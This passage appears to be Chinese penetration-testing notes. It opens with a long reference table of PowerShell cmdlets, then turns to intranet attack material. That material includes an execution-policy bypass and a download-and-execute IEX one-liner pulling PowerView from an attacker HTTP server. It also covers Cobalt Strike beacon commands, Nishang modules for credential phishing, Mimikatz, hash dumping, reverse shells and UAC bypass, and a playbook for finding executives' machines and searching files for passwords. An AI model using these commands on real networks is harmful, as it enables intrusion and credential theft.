Get-UICulture	获取操作系统中当前用户界面 (UI) 区域性设置	Get-UICulture (forsenergy.com)
Get-Unique	从排序列表返回唯一项目	Get-Unique (forsenergy.com)
Get-Variable	获取当前控制台中的变量	Get-Variable (forsenergy.com)
Get-WinEvent	从本地和远程计算机上的事件日志和事件跟踪日志文件中获取事件	Get-WinEvent (forsenergy.com)
Get-WmiObject	获取 Windows Management Instrumentation (WMI) 类的实例或可用类的相关信息	Get-WmiObject (forsenergy.com)
Get-WSManCredSSP	获取客户端的与凭据安全服务提供程序相关的配置	Get-WSManCredSSP (forsenergy.com)
Get-WSManInstance	显示由资源 URI 指定的资源实例的管理信息	Get-WSManInstance (forsenergy.com)

命令	功能	详情链接
Group-Object	指定的属性包含相同值的组对象	Group-Object (forsenergy.com)
Import-Alias	从文件导入别名列表	Import-Alias (forsenergy.com)
Import-Clixml	导入 CLIXML 文件，并在 Windows PowerShell 中创建相应的对象	Import-Clixml (forsenergy.com)
Import-Counter	导入性能计数器日志文件（.blg、.csv、.tsv）并创建表示日志中的每个计数器样本的对象	Import-Counter (forsenergy.com)
Import-CSV	将逗号分隔值 (CSV) 文件中的对象属性转换为原始对象的 CSV 版本	Import-CSV (forsenergy.com)
Import-LocalizedData	根据为操作系统选择的 UI 区域性，将语言特定的数据导入脚本和函数	Import-LocalizedData (forsenergy.com)
Import-Module	向当前会话中添加模块	Import-Module (forsenergy.com)
Import-PSSession	将来自其他会话的命令导入到当前会话中	Import-PSSession (forsenergy.com)
Invoke-Command	在本地和远程计算机上运行命令	Invoke-Command (forsenergy.com)
Invoke-Expression	在本地计算机上运行命令或表达式	Invoke-Expression (forsenergy.com)
Invoke-History	从会话历史记录中运行命令	Invoke-History (forsenergy.com)
Invoke-Item	对指定项执行默认操作	Invoke-Item (forsenergy.com)
Invoke-WmiMethod	调用 Windows Management Instrumentation (WMI) 方法	Invoke-WmiMethod (forsenergy.com)
Invoke-WSManAction	对资源 URI 和选择器指定的对象调用操作	Invoke-WSManAction (forsenergy.com)
Join-Path	将路径和子路径合并到单个路径中。提供程序将提供路径分隔符	Join-Path (forsenergy.com)
Limit-EventLog	设置限制事件日志大小及其条目存在时间的事件日志属性	Limit-EventLog (forsenergy.com)
Measure-Command	度量运行脚本块和 cmdlet 所用的时间	Measure-Command (forsenergy.com)
Measure-Object	计算对象的数字属性以及字符串对象（如文本文件）中的字符数、单词数和行数	Measure-Object (forsenergy.com)
Move-Item	将项从一个位置移动到另一个位置	Move-Item (forsenergy.com)
Move-ItemProperty	将属性从一个位置移动到另一个位置	Move-ItemProperty (forsenergy.com)
New-Alias	创建新别名	New-Alias (forsenergy.com)
New-Event	创建新事件	New-Event (forsenergy.com)
New-EventLog	在本地或远程计算机上创建新事件日志和新事件源	New-EventLog (forsenergy.com)
New-Item	创建新项	New-Item (forsenergy.com)
New-ItemProperty	为项创建新属性并设置该属性的值	New-ItemProperty (forsenergy.com)
New-Module	创建一个仅存在于内存中的新动态模块	New-Module (forsenergy.com)
New-ModuleManifest	创建一个新的模块清单	New-ModuleManifest (forsenergy.com)
New-Object	创建 Microsoft .NET Framework 或 COM 对象的实例	New-Object (forsenergy.com)
New-PSDrive	在当前会话中创建 Windows PowerShell 驱动器	New-PSDrive (forsenergy.com)
New-PSSession	建立与本地或远程计算机的持续性连接	New-PSSession (forsenergy.com)
New-PSSessionOption	创建包含 PSSession 高级选项的对象	New-PSSessionOption (forsenergy.com)
New-Service	创建新的 Windows 服务	New-Service (forsenergy.com)
New-TimeSpan	创建 TimeSpan 对象	New-TimeSpan (forsenergy.com)
New-Variable	创建新变量	New-Variable (forsenergy.com)
New-WebServiceProxy	创建一个 Web 服务代理对象，用于在 Windows PowerShell 中使用和管理 Web 服务	New-WebServiceProxy (forsenergy.com)
New-WSManInstance	创建管理资源的新实例	New-WSManInstance (forsenergy.com)
New-WSManSessionOption	创建 WS-Management 会话选项哈希表以用作以下 WS-Management cmdlet 的输入参数： Get-WSManInstance Set-WSManInstance Invoke-WSManAction Connect-WSMan	New-WSManSessionOption (forsenergy.com)
Out-Default	将输出发送到默认的格式化程序和默认的输出 cmdlet	Out-Default (forsenergy.com)
Out-File	将输出发送到文件	Out-File (forsenergy.com)
Out-GridView	将输出发送到单独窗口中的交互表	Out-GridView (forsenergy.com)
Out-Host	将输出发送到命令行	Out-Host (forsenergy.com)
Out-Null	删除输出，不将其发送到控制台	Out-Null (forsenergy.com)
Out-Printer	将输出发送到打印机	Out-Printer (forsenergy.com)
Out-String	将对象作为一列字符串发送到主机	Out-String (forsenergy.com)
Pop-Location	将当前位置更改为最近推入到堆栈中的位置	Pop-Location (forsenergy.com)
Push-Location	将当前位置添加到位置列表（“堆栈”）的顶部	Push-Location (forsenergy.com)
Read-Host	从控制台读取一行输入	Read-Host (forsenergy.com)
Receive-Job	获取当前会话中 Windows PowerShell 后台作业的结果	Receive-Job (forsenergy.com)
Register-EngineEvent	订阅由 Windows PowerShell 引擎以及由 New-Event cmdlet 生成的事件	Register-EngineEvent (forsenergy.com)
Register-ObjectEvent	订阅由 Microsoft .NET Framework 对象生成的事件	Register-ObjectEvent (forsenergy.com)
Register-PSSessionConfiguration	创建并注册新的会话配置	Register-PSSessionConfiguration (forsenergy.com)
Register-WmiEvent	订阅 Windows Management Instrumentation (WMI) 事件	Register-WmiEvent (forsenergy.com)
Remove-Computer	从工作组或域中删除本地计算机	Remove-Computer (forsenergy.com)
Remove-Event	删除事件队列中的事件	Remove-Event (forsenergy.com)
Remove-EventLog	删除事件日志或注销事件源	Remove-EventLog (forsenergy.com)
Remove-Item	删除指定项	Remove-Item (forsenergy.com)
Remove-ItemProperty	从注册表项中删除属性及其值	Remove-ItemProperty (forsenergy.com)
Remove-Job	删除 Windows PowerShell 后台作业	Remove-Job (forsenergy.com)
Remove-Module	删除当前会话中的模块	Remove-Module (forsenergy.com)
Remove-PSBreakpoint	删除当前控制台中的断点	Remove-PSBreakpoint (forsenergy.com)
Remove-PSDrive	从所在位置删除 Windows PowerShell 驱动器	Remove-PSDrive (forsenergy.com)
Remove-PSSession	关闭一个或多个 Windows PowerShell 会话 (PSSession)	Remove-PSSession (forsenergy.com)
Remove-PSSnapin	将 Windows PowerShell 管理单元从当前会话中删除	Remove-PSSnapin (forsenergy.com)
Remove-Variable	删除变量及其值	Remove-Variable (forsenergy.com)
Remove-WmiObject	删除现有 Windows Management Instrumentation (WMI) 类的实例	Remove-WmiObject (forsenergy.com)
Remove-WSManInstance	删除管理资源实例	Remove-WSManInstance (forsenergy.com)
Rename-Item	重命名 Windows PowerShell 提供程序命名空间中的一个项	Rename-Item (forsenergy.com)
Rename-ItemProperty	重命名项的属性	Rename-ItemProperty (forsenergy.com)
Reset-ComputerMachinePassword	重置计算机的计算机帐户密码	Reset-ComputerMachinePassword (forsenergy.com)
Resolve-Path	解析路径中的通配符并显示路径内容	Resolve-Path (forsenergy.com)
Restart-Computer	重新启动（“重新引导”）本地和远程计算机上的操作系统	Restart-Computer (forsenergy.com)
Restart-Service	停止并接着启动一个或更多服务	Restart-Service (forsenergy.com)
Restore-Computer	在本地计算机上启动系统还原	Restore-Computer (forsenergy.com)
Resume-Service	恢复一项或多项挂起（暂停的）服务	Resume-Service (forsenergy.com)
Select-Object	选择一个对象或一组对象的指定属性。它还可以从对象的数组中选择唯一对象，也可以从对象数组的开头或末尾选择指定个数的对象	Select-Object (forsenergy.com)
Select-String	查找字符串和文件中的文本	Select-String (forsenergy.com)
Select-Xml	在 XML 字符串或文档中查找文本	Select-XML (forsenergy.com)
Send-MailMessage	发送电子邮件	Send-MailMessage (forsenergy.com)
Set-Acl	更改指定资源（例如文件或注册表项）的安全描述符	Set-Acl (forsenergy.com)
Set-Alias	在当前 Windows PowerShell 会话中为 cmdlet 或其他命令元素创建或更改别名（替代名称）	Set-Alias (forsenergy.com)
Set-AuthenticodeSignature	为 Windows PowerShell 脚本或其他文件添加 Authenticode 签名	Set-AuthenticodeSignature (forsenergy.com)
Set-Content	在项中写入内容或用新内容替换其中的内容	Set-Content (forsenergy.com)
Set-Date	将计算机上的系统时间更改为指定的时间	Set-Date (forsenergy.com)
Set-ExecutionPolicy	更改 Windows PowerShell 执行策略的用户首选项	Set-ExecutionPolicy (forsenergy.com)
Set-Item	将项的值更改为命令中指定的值	Set-Item (forsenergy.com)
Set-ItemProperty	创建或更改某一项的属性值	Set-ItemProperty (forsenergy.com)
Set-Location	将当前工作位置设置为指定的位置	Set-Location (forsenergy.com)
Set-PSBreakpoint	在行、命令或变量上设置断点	Set-PSBreakpoint (forsenergy.com)
Set-PSDebug	打开和关闭脚本调试功能，设置跟踪级别并切换 strict 模式	Set-PSDebug (forsenergy.com)
Set-PSSessionConfiguration	更改已注册会话配置的属性	Set-PSSessionConfiguration (forsenergy.com)
Set-Service	启动、停止和挂起服务并更改服务的属性	Set-Service (forsenergy.com)
Set-StrictMode	建立和强制执行表达式、脚本和脚本块中的编码规则	Set-StrictMode (forsenergy.com)
Set-TraceSource	配置、启动和停止对 Windows PowerShell 组件的跟踪	Set-TraceSource (forsenergy.com)
Set-Variable	设置变量的值。如果不存在具有所请求名称的变量，则创建该变量	Set-Variable (forsenergy.com)
Set-WmiInstance	创建或更新现有 Windows Management Instrumentation (WMI) 类的实例	Set-WmiInstance (forsenergy.com)
Set-WSManInstance	修改与资源相关的管理信息	Set-WSManInstance (forsenergy.com)
Set-WSManQuickConfig	配置本地计算机的远程管理	Set-WSManQuickConfig (forsenergy.com)
Show-EventLog	在事件查看器中显示本地或远程计算机的事件日志	Show-EventLog (forsenergy.com)

命令	功能	详情链接
Sort-Object	按属性值对对象进行排序	Sort-Object (forsenergy.com)
Split-Path	返回指定的路径部分	Split-Path (forsenergy.com)
Start-Job	启动 Windows PowerShell 后台作业	Start-Job (forsenergy.com)
Start-Process	启动本地计算机上的一个或多个进程	Start-Process (forsenergy.com)
Start-Service	启动一个或多个已停止的服务	Start-Service (forsenergy.com)
Start-Sleep	将脚本或会话中的活动挂起指定的一段时间	Start-Sleep (forsenergy.com)
Start-Transaction	启动事务	Start-Transaction (forsenergy.com)
Start-Transcrip	在文本文件中创建全部或部分 Windows PowerShell 会话的记录	Start-Transcript (forsenergy.com)
Stop-Computer	停止（关闭）本地和远程计算机	Stop-Computer (forsenergy.com)
Stop-Job	停止 Windows PowerShell 后台作业	Stop-Job (forsenergy.com)
Stop-Process	停止一个或多个正在运行的进程	Stop-Process (forsenergy.com)
Stop-Service	停止一个或多个正在运行的服务	Stop-Service (forsenergy.com)
Stop-Transcript	停止脚本	Stop-Transcript (forsenergy.com)
Suspend-Service	挂起（暂停）一个或多个正在运行的服务	Suspend-Service (forsenergy.com)
Tee-Object	将命令输出保存在文件或变量中，并将其显示在控制台中	Tee-Object (forsenergy.com)
Test-ComputerSecureChannel	测试并修复本地计算机与其域之间的安全通道	Test-ComputerSecureChannel (forsenergy.com)
Test-Connection	将 ICMP 回显请求数据包（“ping”）发送给一台或多台计算机	Test-Connection (forsenergy.com)
Test-ModuleManifest	验证模块清单文件是否准确描述了模块的内容	Test-ModuleManifest (forsenergy.com)
Test-Path	确定路径的所有元素是否存在	Test-Path (forsenergy.com)
Test-WSMan	测试 WinRM 服务是否正在本地或远程计算机上运行	Test-WSMan (forsenergy.com)
Trace-Command	配置并启动对指定表达式或命令的跟踪	Trace-Command (forsenergy.com)
Undo-Transaction	回滚活动事务	Undo-Transaction (forsenergy.com)
Unregister-Event	取消事件订阅	Unregister-Event (forsenergy.com)
Unregister-PSSessionConfiguration	从计算机上删除已注册的会话配置	Unregister-PSSessionConfiguration (forsenergy.com)
Update-FormatData	更新当前会话中的格式数据	Update-FormatData (forsenergy.com)
Update-List	在包含对象集合的属性值中添加和删除项	Update-List (forsenergy.com)
Update-TypeData	通过将 *.types.ps1xml 文件重新加载到内存中来更新当前的扩展类型配置	Update-TypeData (forsenergy.com)
Use-Transaction	将脚本块添加到活动事务中	Use-Transaction (forsenergy.com)
Wait-Event	等到引发特定事件后再继续运行	Wait-Event (forsenergy.com)
Wait-Job	禁止显示命令提示符，直至在会话中运行的一个或全部 Windows PowerShell 后台作业完成	Wait-Job (forsenergy.com)
Wait-Process	等到进程停止后再接受更多输入	Wait-Process (forsenergy.com)
Where-Object	创建控制哪些对象沿着命令管道传递的筛选器	Where-Object (forsenergy.com)
Write-Debug	将调试消息写入控制台	Write-Debug (forsenergy.com)
Write-Error	将对象写入错误流	Write-Error (forsenergy.com)
Write-EventLog	将事件写入事件日志	Write-EventLog (forsenergy.com)
Write-Host	将自定义的输出内容写入主机	Write-Host (forsenergy.com)
Write-Output	将指定对象发送到管道中的下一个命令。如果该命令是管道中的最后一个命令，则在控制台上显示这些对象	Write-Output (forsenergy.com)
Write-Progress	在 Windows PowerShell 命令窗口内显示进度栏	Write-Progress (forsenergy.com)
Write-Verbose	将文本写入详细消息流	Write-Verbose (forsenergy.com)
Write-Warning	写入警告消息	Write-Warning (forsenergy.com)

powershell脚本

Powershell一般初始化情况下都会禁止脚本执行。脚本能否执行取决于Powershell的执行策略

Get-ExecutionPolicy -->查看权限

Unrestricted:权限最高，可以不受限制执行任何脚本。
Default:为Powershell默认的策略。
Restricted，不允许任何脚本执行。
AllSigned：所有脚本都必须经过签名才能在运行。
RemoteSigned：本地脚本无限制，但是对来自网络的脚本必须经过签名

改变运行策略：
Set-ExecutionPolicy Unrestricted

11. 内网渗透Powershell脚本

PowerSploit

PowerSploit是GitHub上面的一个安全项目，上面有很多powershell攻击脚本，它们主要被用来渗透中的信息侦察、权限提升、权限维持。

Powershell的优点:

1. 代码运行在内存中可以不去接触磁盘
2. 从另一个系统中下载代码并执行
3. 很多安全产品并不能检测到powershell的活动
4. cmd.exe通常被阻止运行，但是powershell不会

AntivirusBypass：发现杀毒软件的查杀特征。

CodeExecution：在目标主机上执行代码。

Exfiltration：目标主机上的信息搜集工具。

Mayhem：蓝屏等破坏性脚本。

Persistence：后面脚本(持久性控制)。

Recon：以目标主机为跳板进行内网信息侦察。

ScriptModification：在目标主机上创建或修改脚本

powerview也是一款非常的powershell脚本工具，用于域内信息的收集。他集成在在 PowerSploit- master\Recon目录下。

使用方式三种方式：

本地执行：

shell powershell.exe -exec bypass -command "& { import-module C:\.......\PowerView.ps1;Get-NetShare}"

远程执行：

python 开启http 服务 python -m http.server 8080

shell powershell -exec bypass -c IEX(New-Object System.Net.WebClient).DownloadString('http://ip:端口/PowerView.ps1');import-module .\PowerView.ps1;Get-NetShare

CS自带命令

beacon> powershell-import //导入各种powershell脚本
beacon>powershell posershell脚本名 //执行脚本
beacon> powershell Check-VM //执行命令

命令	功能
GET-NetDomain	获取当前用户所在的域名称
Get-NetUser	返回所有用户详情信息
GET-NetDomainController	获取所有域控制器
GET-NetComputer	获取所有域内机器详情信息
GET-NetOUt	获取域中OU信息
GET-NetGroup	获取所有域内组合组成员信息
GET-NetFileServer	根据SPN获取当前使用的文件服务器
GET-NetShare	获取当前域内所有网络共享
Get-NetSession	获取在指定服务器存在的Session信息
Get-NetRDPSession	获取在指定服务器存在的远程连接信息
Get-NetProcess	获取远程主机的进程信息
Get-UserEvent	获取指定用户日志信息
Get-ADObject	获取活动目录的对象信息
Get-NetGPO	获取域所有组策略对象
Get-DomainPolicy	获取域默认或域控制器策略
Invoke-UserHunter	搜索网络中域管理员正在使用的主机
Invoke-ProcessHunter	查找域内所有机器进程用于找到某特定用户
Invoke-UserEventHunter	根据用户日志获取某域用户登陆过哪些域机器

Nishang

1. 本地执行

查看可用的模块

shell powershell Import-Module .\nishang\nishang.psm1;Get-Command -Module nishang

Check-VM 检测该主机是不是虚拟机
Invoke-CredentialsPhish 欺骗用户，让用户输入密码
Get-WLAN-Keys 	获取wifi信息
Invoke-Mimikatz 抓密码
Get-PassHashes 获 取 hash
Get-PassHints 获取用户的密码提示信息Invoke-PowerShellTcp 反 弹 shell Invoke-PsUACme 绕过UAC
Remove-Update 删除补丁Get-Information 本机信息

2. 远程执行

powershell-import nishang\nishang.psm1 
powershell 命令

敏感数据定位

内网的核心敏感数据，不仅包括数据库、电子邮件，还包括个人数据及组织的业务数据、技术数据

等。可以说，价值较高的数据基本都在内网中。

1. 资料、数据、文件的定位流程：
   1. 定位内部人事组织结构
   2. 在内部人事组织结构中寻找需要监视的人员
   3. 定位相关人员的机器
   4. 视相关人员存放文档的位置
   5. 列出存放文档的服务器的目录
2. 重点核心业务机器
   1. 高级管理人员 系统管理人员 财务/人事/业务人员的个人计算机
   2. 产品管理系统服务器
   3. 办公系统服务器
   4. 财务应用系统服务器
   5. 核心产品源码服务器（SVN/GIT服务器）
   6. 数据库服务器
   7. 文件服务器，
   8. 共享服务器
   9. 电子邮件服务器
   10. 网站监控系统服务器
   11. 信息安全监控服务器
   12. 生产工厂服务器
3. 敏感信息和敏感文件
   1. 站点源码备份文件，
   2. 数据库备份文件等等
   3. 游览器保存的密码和游览器的cookie
   4. 其他用户会话，
   5. 3389和ipc$连接记录，
   6. 回收站中的信息等等
   7. Windows的无线密码
   8. 网络内部的各种账号密码，
   9. 包含电子邮箱，V**，FTP等等

在内网中,我们一定要知道自己拿下的机器的人员的职位（职位高的人在内网中权限也高，计算机中

的敏感信息也多，还有一种就是特殊职位的人员，例如上面说的，一般都有一些与职位相关的敏感信

息。）还有就是拿下一台机器后要先维权，权限稳了再收集信息，信息收集一定要全面仔细，信息收

集完了再搞内网。往目标主机中传工具用完就删。翻文件的话，可以使用一些搜索命令来快速寻找。

1.指定目录下搜集各类敏感文件
dir /a /s /b d:\"*.txt"
dir /a /s /b C:\"*.xlsx"
dir /a /s /b d:\"*.md"
dir /a /s /b d:\"*.sql"
dir /a /s /b d:\"*.pdf"
dir /a /s /b d:\"*.docx"
dir /a /s /b d:\"*.doc"
dir /a /s /b d:\"*conf*"
dir /a /s /b d:\"*bak*"
dir /a /s /b d:\"*pwd*"
dir /a /s /b d:\"*pass*"
dir /a /s /b d:\"*login*"
dir /a /s /b d:\"*user*"
2.指定目录下的文件中搜集各种账号密码
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak